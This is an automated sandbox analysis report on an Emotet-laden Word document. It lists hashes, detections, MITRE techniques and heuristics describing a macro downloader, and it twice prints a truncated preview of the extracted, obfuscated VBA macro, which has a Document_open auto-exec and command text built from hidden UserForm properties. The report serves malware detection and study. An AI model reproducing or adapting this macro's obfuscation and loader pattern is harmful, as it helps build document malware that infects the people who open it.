Emotet Office (OLE) malware analysis — malicious · 0dc0bda81ebdc4de

MALICIOUS

Office (OLE)

179.9 KB Created: 2019-12-13 05:53:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: c610904e32f9cbd7e7cc6b8b4d2314d4 SHA-1: 1026f355ea7beb36ac7a98171f96c91d4b7d5328 SHA-256: 0dc0bda81ebdc4de5edc1af4a8979d9a01a10ada4dbb4a393c3fedc618bc99db

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. The heuristics indicate a hidden UserForm command stager and auto-execution via CreateObject, suggesting the macro is designed to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature as Emotet.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7451162-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7451162-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8309 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8309 bytes
SHA-256: `322fc26dc9839f96c8d2604638961df4d0a9d0e570591190a62f2f81d2d9cf9d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Jtqppansht" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Aeeukravytz, 0, 0, MSForms, TextBox" Private Sub Document_open() Select Case Jpjmzyxc Case 19 Pwcaqrvfssu = Cos(439) Eggqzccgk = Atn(886) Qikzaarwxn = Cos(808) Case 629 Gotjwqmn = Atn(185) Hffshxzbieur = 136 Gverbytuq = CDate(107) Case 77 Cgsfpyod = CInt(777) Fuhttwwf = Log(Pflcbmvmj) Pzsfrhvsgfn = Bbwyhbwoh End Select Select Case Fgblbxggocdkx Case 415 Mncebatc = Cos(611) Dtxprsexlzy = Atn(414) Xbrbulmhmgyjr = Cos(353) Case 476 Xwlebyydirwjy = Atn(873) Fbpqedkyzr = 555 Rmygzwgao = CDate(330) Case 613 Wzzxikybouab = CInt(236) Bqvmxmmntgrj = Log(Msnxrgsqffboa) Kqlblygknrbii = Gyzcowhdjrbk End Select Select Case Ravrltxclz Case 800 Clmrvgvbx = Cos(245) Xhwxmibjaw = Atn(57) Kduczwlkqolpc = Cos(36) Case 760 Zhfolioxko = Atn(739) Ujqrjwpboa = 470 Flzuivhuawbb = CDate(69) Case 39 Unvfkndlr = CInt(709) Xctmjxze = Log(Aiupphbkxh) Bbbgiqpsutyul = Iqycxlzuebq End Select Jfxlnrsficzmx End Sub Attribute VB_Name = "Twhafhefmvv" Attribute VB_Base = "0{1BAF1910-618A-4420-9084-64F0B573C63C}{FE794E19-339A-4D90-8956-27C2E008CA72}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Lkoibvaurl" Function Yfjjffbgeayj() Select Case Dfwwimgr Case 853 Tjiolfctqhp = Cos(502) Unlbccmchtlu = Atn(872) Jriaofdkpnr = Cos(915) Case 615 Fvaknuncj = Atn(319) Dozolqxtso = 526 Hhbdojxy = CDate(306) Case 824 Whhhiyzeozvyw = CInt(707) Pzzqxnqmt = Log(Mrzsmyag) Hehyuoatgjkb = Kximjgunofmhe End Select Vnivkcoxgms = Jtqppansht.Aeeukravytz Select Case Cwtcjols Case 894 Qyiqkbuu = Cos(109) Ggbtwvcur = Atn(2) Czvvvsgkvnkps = Cos(39) Case 36 Byaylvuvuvuz = Atn(440) Mqbngnzmvoi = 197 Tuwqjoctdu = CDate(481) Case 938 Aidazasawiwjb = CInt(112) Updlpwlabyfl = Log(Tiviqgev) Opnnkxmoxxiea = Apibctpi End Select Pekavoiyqhro = Vnivkcoxgms + Twhafhefmvv.Yuqvxxmhhy + Twhafhefmvv.Nvylwcphvjgew + Twhafhefmvv.Zbvcmpsrvzof Select Case Xnnxshphevfin Case 405 Xenprpgrqz = Cos(524) Vwplhagbefq = Atn(51) Jfqhffam = Cos(232) Case 233 Vqhbjrvx = Atn(357) Tukpjyihmir = 318 Phjpkluc = CDate(473) Case 303 Vtuzywjii = CInt(916) Gpvbygwsagjho = Log(Ablldmsnpvoy) Czjveisonm = Jaammghdwixwp End Select Fyeltbcyzeyah = Pekavoiyqhro + Twhafhefmvv.Pwlrpnrmnwl + Twhafhefmvv.Pbgflrvoug.ControlTipText Select Case Wwmzdfkcf Case 249 Zpzvgiqgoa = Cos(276) Hgumpowapdz = Atn(379) Dphyvuforp = Cos(86) Case 989 Lflowkergeti = Atn(596) Niftvqimdtii = 903 Aaqqqueil = CDate(691) Case 740 Svzcywzfagwj = CInt(27) Ojzbsforxqfn = Log(Yqewtacuikex) Tzdrsvbl = Tfebxiwks End Select Yfjjffbgeayj = Whmqyuaztu + Fyeltbcyzeyah + Whmqyuaztu Select Case Hhpdpxmwnhh Case 433 Rrxxuxxt = Cos(614) Gndjbkhrvsffx = Atn(431) Hbrkrkfjiaqdw = Cos(253) Case 132 Mwjjjqlollf = Atn(257) Zxltixmvgj = 80 Aeuilhlyffi = CDate(103) Case 668 ... (truncated)

SHA-256: 322fc26dc9839f96c8d2604638961df4d0a9d0e570591190a62f2f81d2d9cf9d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Jtqppansht"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Aeeukravytz, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Jpjmzyxc
      Case 19
         Pwcaqrvfssu = Cos(439)
         Eggqzccgk = Atn(886)
         Qikzaarwxn = Cos(808)
      Case 629
         Gotjwqmn = Atn(185)
         Hffshxzbieur = 136
         Gverbytuq = CDate(107)
      Case 77
         Cgsfpyod = CInt(777)
         Fuhttwwf = Log(Pflcbmvmj)
         Pzsfrhvsgfn = Bbwyhbwoh
End Select
   Select Case Fgblbxggocdkx
      Case 415
         Mncebatc = Cos(611)
         Dtxprsexlzy = Atn(414)
         Xbrbulmhmgyjr = Cos(353)
      Case 476
         Xwlebyydirwjy = Atn(873)
         Fbpqedkyzr = 555
         Rmygzwgao = CDate(330)
      Case 613
         Wzzxikybouab = CInt(236)
         Bqvmxmmntgrj = Log(Msnxrgsqffboa)
         Kqlblygknrbii = Gyzcowhdjrbk
End Select
   Select Case Ravrltxclz
      Case 800
         Clmrvgvbx = Cos(245)
         Xhwxmibjaw = Atn(57)
         Kduczwlkqolpc = Cos(36)
      Case 760
         Zhfolioxko = Atn(739)
         Ujqrjwpboa = 470
         Flzuivhuawbb = CDate(69)
      Case 39
         Unvfkndlr = CInt(709)
         Xctmjxze = Log(Aiupphbkxh)
         Bbbgiqpsutyul = Iqycxlzuebq
End Select
Jfxlnrsficzmx
End Sub

Attribute VB_Name = "Twhafhefmvv"
Attribute VB_Base = "0{1BAF1910-618A-4420-9084-64F0B573C63C}{FE794E19-339A-4D90-8956-27C2E008CA72}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Lkoibvaurl"
Function Yfjjffbgeayj()
   Select Case Dfwwimgr
      Case 853
         Tjiolfctqhp = Cos(502)
         Unlbccmchtlu = Atn(872)
         Jriaofdkpnr = Cos(915)
      Case 615
         Fvaknuncj = Atn(319)
         Dozolqxtso = 526
         Hhbdojxy = CDate(306)
      Case 824
         Whhhiyzeozvyw = CInt(707)
         Pzzqxnqmt = Log(Mrzsmyag)
         Hehyuoatgjkb = Kximjgunofmhe
End Select
Vnivkcoxgms = Jtqppansht.Aeeukravytz
   Select Case Cwtcjols
      Case 894
         Qyiqkbuu = Cos(109)
         Ggbtwvcur = Atn(2)
         Czvvvsgkvnkps = Cos(39)
      Case 36
         Byaylvuvuvuz = Atn(440)
         Mqbngnzmvoi = 197
         Tuwqjoctdu = CDate(481)
      Case 938
         Aidazasawiwjb = CInt(112)
         Updlpwlabyfl = Log(Tiviqgev)
         Opnnkxmoxxiea = Apibctpi
End Select
Pekavoiyqhro = Vnivkcoxgms + Twhafhefmvv.Yuqvxxmhhy + Twhafhefmvv.Nvylwcphvjgew + Twhafhefmvv.Zbvcmpsrvzof
   Select Case Xnnxshphevfin
      Case 405
         Xenprpgrqz = Cos(524)
         Vwplhagbefq = Atn(51)
         Jfqhffam = Cos(232)
      Case 233
         Vqhbjrvx = Atn(357)
         Tukpjyihmir = 318
         Phjpkluc = CDate(473)
      Case 303
         Vtuzywjii = CInt(916)
         Gpvbygwsagjho = Log(Ablldmsnpvoy)
         Czjveisonm = Jaammghdwixwp
End Select
Fyeltbcyzeyah = Pekavoiyqhro + Twhafhefmvv.Pwlrpnrmnwl + Twhafhefmvv.Pbgflrvoug.ControlTipText
   Select Case Wwmzdfkcf
      Case 249
         Zpzvgiqgoa = Cos(276)
         Hgumpowapdz = Atn(379)
         Dphyvuforp = Cos(86)
      Case 989
         Lflowkergeti = Atn(596)
         Niftvqimdtii = 903
         Aaqqqueil = CDate(691)
      Case 740
         Svzcywzfagwj = CInt(27)
         Ojzbsforxqfn = Log(Yqewtacuikex)
         Tzdrsvbl = Tfebxiwks
End Select
Yfjjffbgeayj = Whmqyuaztu + Fyeltbcyzeyah + Whmqyuaztu
   Select Case Hhpdpxmwnhh
      Case 433
         Rrxxuxxt = Cos(614)
         Gndjbkhrvsffx = Atn(431)
         Hbrkrkfjiaqdw = Cos(253)
      Case 132
         Mwjjjqlollf = Atn(257)
         Zxltixmvgj = 80
         Aeuilhlyffi = CDate(103)
      Case 668
       
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.